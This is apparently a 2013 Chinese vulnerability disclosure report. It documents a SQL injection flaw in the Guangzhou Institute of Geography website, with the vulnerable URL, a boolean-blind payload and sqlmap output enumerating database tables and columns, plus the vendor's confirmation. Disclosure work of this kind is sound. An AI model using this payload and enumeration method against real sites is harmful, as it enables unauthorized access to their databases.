漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-07-31: 细节已通知厂商并且等待厂商处理中
2013-07-31: 厂商已经确认,细节仅向厂商公开
2013-08-10: 细节向核心白帽子及相关领域专家公开
2013-08-20: 细节向普通白帽子公开
2013-08-30: 细节向实习白帽子公开
2013-09-14: 细节向公众公开
简要描述:
广州地理研究所最早成立于1958年,原属中国科学院,现属于广东省科学院。
该站存在sql注入漏洞,但没有取得可得用信息进入后台。
详细说明:
问题页面:
http://www.gig.gdas.ac.cn/list.asp?id=24
使用sqlmap:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=24 AND 4478=4478
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=24 AND 4478=4478
---
Database: Microsoft_Access_masterdb
[2 tables]
+-------+
| links |
| news |
+-------+
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=24 AND 4478=4478
---
Database: Microsoft_Access_masterdb
Table: links
[7 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| class | non-numeric |
| classid | numeric |
| id | numeric |
| link | non-numeric |
| name | non-numeric |
| note | non-numeric |
| num | numeric |
+---------+-------------+
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=24 AND 4478=4478
---
Database: Microsoft_Access_masterdb
Table: news
[5 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| class | non-numeric |
| content | non-numeric |
| id | numeric |
| num | numeric |
| title | non-numeric |
+---------+-------------+
修复方案:
web防护
版权声明:转载请注明来源 霍大然@乌云
>
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2013-07-31 15:22
厂商回复:
感谢您的支持,我们会尽快处理相关问题。
最新状态:
暂无